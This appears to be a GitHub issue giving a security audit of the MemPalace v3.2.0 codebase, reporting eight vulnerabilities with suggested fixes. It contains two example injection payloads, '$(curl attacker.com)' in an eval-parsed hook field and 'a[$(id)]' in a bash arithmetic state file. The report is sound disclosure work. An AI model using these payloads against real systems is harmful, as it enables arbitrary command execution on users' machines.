Security Audit: 8 unreported vulnerabilities — data leakage, shell injection, file permissions

## Security Audit Report

Hi Milla, Ben, and the MemPalace community!

I ran a full security audit on the v3.2.0 codebase (commit `6614b9b`, `develop` branch) before deploying MemPalace in my own workflow. I found **8 previously unreported vulnerabilities** that I'd like to flag — and I'm happy to submit PRs for all of them.

I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover some related ground, but the findings below are **not covered by any existing issue or PR**.

---

## CRITICAL

### 1. Wikipedia SSRF in `entity_registry.py` — violates local-first guarantee

**File:** `mempalace/entity_registry.py`, lines 176–257

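`_wikipedia_lookup()` makes an outbound HTTPS GET to `https://en.wikipedia.org/api/rest_v1/page/summary/{word}` whenever `research()` is called. This is in the core package, not a benchmark or optional module. Because the host is fixed, this is closer to an unsolicited outbound request (data leakage) than to classic SSRF, but the privacy impact is the same: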

- Any entity name extracted during mining gets sent to Wikipedia
- User's IP is disclosed to Wikipedia (and any network observer)
- Directly violates CLAUDE.md: *"Privacy by architecture — The system physically cannot send your data because it never leaves your machine"*

Additionally, if Wikipedia returns 404, the word is classified as `"person"` with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.

**Suggested fix:** Make `research()` local-only by default. Require explicit `allow_network=True` opt-in for Wikipedia lookups, and return `"unknown"` with low confidence on 404 instead of asserting person.
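
A minimal sketch of the opt-in behaviour described above. The signature, the injected `lookup` callable, and the shape of the returned dict are assumptions for illustration, not the current `research()` API:

```python
from typing import Callable, Optional


def research(
    word: str,
    allow_network: bool = False,
    lookup: Optional[Callable[[str], Optional[dict]]] = None,
) -> dict:
    """Classify `word`; only touch the network when explicitly allowed.

    `lookup` stands in for a wrapper around `_wikipedia_lookup()` that
    returns None when Wikipedia answers 404 (hypothetical contract).
    """
    if not allow_network or lookup is None:
        # Local-only default: nothing leaves the machine.
        return {"word": word, "type": "unknown", "confidence": 0.0, "source": "local"}

    summary = lookup(word)
    if summary is None:
        # A 404 means "no article found", not "this is a person".
        return {"word": word, "type": "unknown", "confidence": 0.1, "source": "wikipedia"}

    return {
        "word": word,
        "type": summary.get("type", "unknown"),
        "confidence": summary.get("confidence", 0.5),
        "source": "wikipedia",
    }
```

With this shape, existing callers that never pass `allow_network=True` stay fully offline, and a missing article no longer produces a `"person"` entry.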

---

### 2. Shell injection via `eval` in `mempal_save_hook.sh` — `stop_hook_active` not sanitized

**File:** `hooks/mempal_save_hook.sh`, lines 68–80

The save hook uses `eval` to parse Python output into shell variables. The `stop_hook_active` field is **not passed through the `safe()` lambda** (unlike `session_id` and `transcript_path`):

```bash
eval $(echo "$INPUT" | python3 -c "
...
safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
print(f'SESSION_ID=\"{safe(sid)}\"')
print(f'STOP_HOOK_ACTIVE=\"{sha}\"')       # ← NOT sanitized
print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
")
```

If the JSON input contains `"stop_hook_active": "$(curl attacker.com)"`, bash will execute the command substitution inside `eval`.

**Suggested fix:** Validate `stop_hook_active` is strictly `True` or `False` before printing:

```python
sha_raw = data.get('stop_hook_active', False)
sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1') else 'False'
```

---

### 3. `transcript_path` from stdin opens arbitrary files in `hooks_cli.py`

**File:** `mempalace/hooks_cli.py`, lines 42–77, 124–126

`transcript_path` is read from the stdin JSON and passed to `_count_human_messages()` which calls `Path(transcript_path).expanduser()` and opens the file. No containment check ensures the path is within the expected Claude Code sessions directory.

**Suggested fix:** Validate the resolved path is under the expected root (e.g., `~/.claude/projects`) and has a `.jsonl`/`.json` extension before opening.
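
One way the containment check could look. `resolve_transcript` and `ALLOWED_SUFFIXES` are hypothetical names, and the root directory is passed in by the caller rather than assumed:

```python
from pathlib import Path
from typing import Optional

ALLOWED_SUFFIXES = {".jsonl", ".json"}


def resolve_transcript(transcript_path: str, root: Path) -> Optional[Path]:
    """Return the resolved path if it is a transcript under `root`, else None."""
    try:
        candidate = Path(transcript_path).expanduser().resolve()
        base = root.expanduser().resolve()
    except (OSError, RuntimeError):
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    # resolve() collapses ".." and follows symlinks, so the check below
    # applies to the real target rather than the string the caller sent.
    if base not in candidate.parents:
        return None
    return candidate
```

`_count_human_messages()` would then open only the returned path and treat `None` as "no transcript".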

---

## HIGH

### 4. Arithmetic injection in `mempal_save_hook.sh`

**File:** `hooks/mempal_save_hook.sh`, lines 120–124

```bash
LAST_SAVE=$(cat "$LAST_SAVE_FILE")
SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
```

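`LAST_SAVE` is read from a state file and used directly in `$((...))` without checking that it is an integer. Bash arithmetic recursively evaluates a variable's value as an expression, and an array subscript inside that value (for example `a[$(id)]`) undergoes command substitution, so a tampered state file can execute arbitrary commands.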

**Suggested fix:**
```bash
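LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE" 2>/dev/null || true)
LAST_SAVE=0  # fall back to 0 when the state file is missing or malformed
if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
    LAST_SAVE=$((10#$LAST_SAVE_RAW))  # force base 10 so "08" is not parsed as octal
fi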
```

---

## MEDIUM

### 5. File permissions — 6 locations create sensitive files world-readable

On Linux with the default umask (`022`), these paths are created world-readable (files with mode `644`, directories with mode `755`):

| File | What's exposed |
|------|---------------|
| `hooks_cli.py:84` — `~/.mempalace/hook_state/` | Session IDs, timestamps |
| `entity_registry.py:311` — `entity_registry.json` | Names of all people, relationships, aliases |
| `knowledge_graph.py:53` — `knowledge_graph.sqlite3` | Every temporal fact ever stored |
| `exporter.py:51` — export output directory | Complete verbatim memory palace |
| `config.py:227` — `people_map.json` | Name mappings for all people |
| `mcp_server.py:92` — WAL file (TOCTOU race) | Write audit log |

**Suggested fix:** Apply `chmod(0o700)` to directories and `chmod(0o600)` to files immediately after creation, with `try/except (OSError, NotImplementedError): pass` for Windows compatibility.
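
A sketch of two helpers that could back this fix; `make_private_dir` and `write_private_file` are hypothetical names. As a variation on the suggestion above, the file helper sets the mode at creation time via `os.open`, which avoids the short window in which a freshly created file is still world-readable:

```python
import os
from pathlib import Path


def make_private_dir(path: Path) -> None:
    """Create `path` (and parents) and restrict the leaf directory to the owner."""
    path.mkdir(parents=True, exist_ok=True, mode=0o700)
    try:
        os.chmod(path, 0o700)  # also tightens a directory that already existed
    except (OSError, NotImplementedError):
        pass  # best effort on platforms without POSIX permission bits


def write_private_file(path: Path, data: str) -> None:
    """Write `data` to a file that is created with mode 0o600 from the start."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(data)
    try:
        os.chmod(path, 0o600)  # tighten a file that pre-dated this fix
    except (OSError, NotImplementedError):
        pass
```

SQLite and ChromaDB create their own files, so for `knowledge_graph.sqlite3` the directory-level restriction is likely the more practical control.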

---

### 6. Slack transcript role spoofing in `normalize.py`

**File:** `mempalace/normalize.py`, lines 276–306

The Slack JSON parser assigns `"user"` to the first speaker and `"assistant"` to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role `"user"`, making attacker-written text appear as the memory owner's own words in all future retrieval.

**Suggested fix:** Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign `user`/`assistant` roles to arbitrary speakers.
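
A rough sketch of the provenance-preserving approach. It assumes the usual Slack export message fields (`type`, `user`, `text`); the `user_name` fallback, the header wording, and the output format are illustrative choices, not what `normalize.py` currently emits:

```python
from typing import Dict, List

PROVENANCE = "[source: slack export; multi-party chat; speaker identities unverified]"


def normalize_slack(messages: List[Dict]) -> str:
    """Render a Slack export as speaker-labelled lines without user/assistant roles."""
    lines = [PROVENANCE]
    for msg in messages:
        if msg.get("type") != "message" or not msg.get("text"):
            continue
        speaker = msg.get("user_name") or msg.get("user") or "unknown"
        # Indent continuation lines so embedded newlines cannot forge
        # what looks like a new speaker line.
        text = str(msg["text"]).replace("\n", "\n    ")
        lines.append(f"{speaker}: {text}")
    return "\n".join(lines)
```

Retrieval can then surface the header alongside any hit, so text from a third party is never presented as the memory owner's own words.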

---

### 7. `palace_path` from env var not normalized

**File:** `mempalace/config.py`, lines 143–148

`MEMPALACE_PALACE_PATH` from environment is used as-is, without `os.path.abspath()` or `expanduser()`. This differs from the `--palace` CLI arg (which gets `abspath` at `mcp_server.py:62`). A value with `../` components could redirect palace storage.

**Suggested fix:** Apply `os.path.abspath(os.path.expanduser(env_val))` in the config loader.
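
For illustration, the normalization could sit in a small helper like the one below. `palace_path_from_env` is a hypothetical name, and the `env` parameter exists only to make the function easy to test:

```python
import os
from typing import Mapping, Optional


def palace_path_from_env(default: str, env: Optional[Mapping[str, str]] = None) -> str:
    """Return an absolute, user-expanded palace path from the environment."""
    env = os.environ if env is None else env
    raw = env.get("MEMPALACE_PALACE_PATH") or default
    # expanduser() handles "~"; abspath() anchors relative paths and collapses "..".
    return os.path.abspath(os.path.expanduser(raw))
```

This matches what the `--palace` CLI argument already gets, so both entry points would resolve to the same directory for the same input.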

---

### 8. Date fields in KG tools not validated

**File:** `mempalace/mcp_server.py`, line 748; `knowledge_graph.py`, lines 219–242

`as_of`, `valid_from`, `valid_to` parameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).

**Suggested fix:** Add an ISO-8601 date format validator at the MCP boundary:
```python
_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')
```
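
A sketch of how that pattern might be wrapped at the MCP boundary; `validate_date` is a hypothetical helper name. The regex alone still accepts impossible dates such as `2024-02-31`, so this version adds a calendar check for full dates:

```python
import re
from datetime import date
from typing import Optional

_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')


def validate_date(value: Optional[str], field: str) -> Optional[str]:
    """Return `value` unchanged if it is None, YYYY-MM, or a real YYYY-MM-DD date."""
    if value is None:
        return None
    # fullmatch() also rejects a trailing newline, which `$` alone would allow.
    if not isinstance(value, str) or not _DATE_RE.fullmatch(value):
        raise ValueError(f"{field} must be YYYY-MM or YYYY-MM-DD, got {value!r}")
    if len(value) == 10:
        try:
            date.fromisoformat(value)  # rejects dates that do not exist
        except ValueError:
            raise ValueError(f"{field} is not a valid calendar date: {value!r}") from None
    return value
```

Raising at the boundary turns a silent empty result into an explicit error the MCP client can act on.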

---

## Relationship to existing issues/PRs

- **#401** (security hardening RFC): findings 2, 4, 5, and 8 fall within that RFC's scope. I can implement fixes for the parts not yet covered.
- **#438**: covers precompact `session_id` sanitization and regex escape. Finding 2 covers the **save hook** `eval` issue, which #438 does not address.
- **#477**: search limit exhaustion. Not duplicated here.
- **#782**: ChromaDB telemetry. Not duplicated here.

## Next steps

I'm happy to submit focused PRs for each finding, targeting `develop`:

- `fix/security-wikipedia-ssrf` — Finding 1
- `fix/security-hook-injection` — Findings 2, 3, 4
- `fix/security-file-permissions` — Finding 5
- `fix/security-normalize-roles` — Finding 6
- `fix/security-config-validation` — Findings 7, 8

Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.

Thanks for building MemPalace — it's a great project and I want to help make it solid.

— @Kesshite
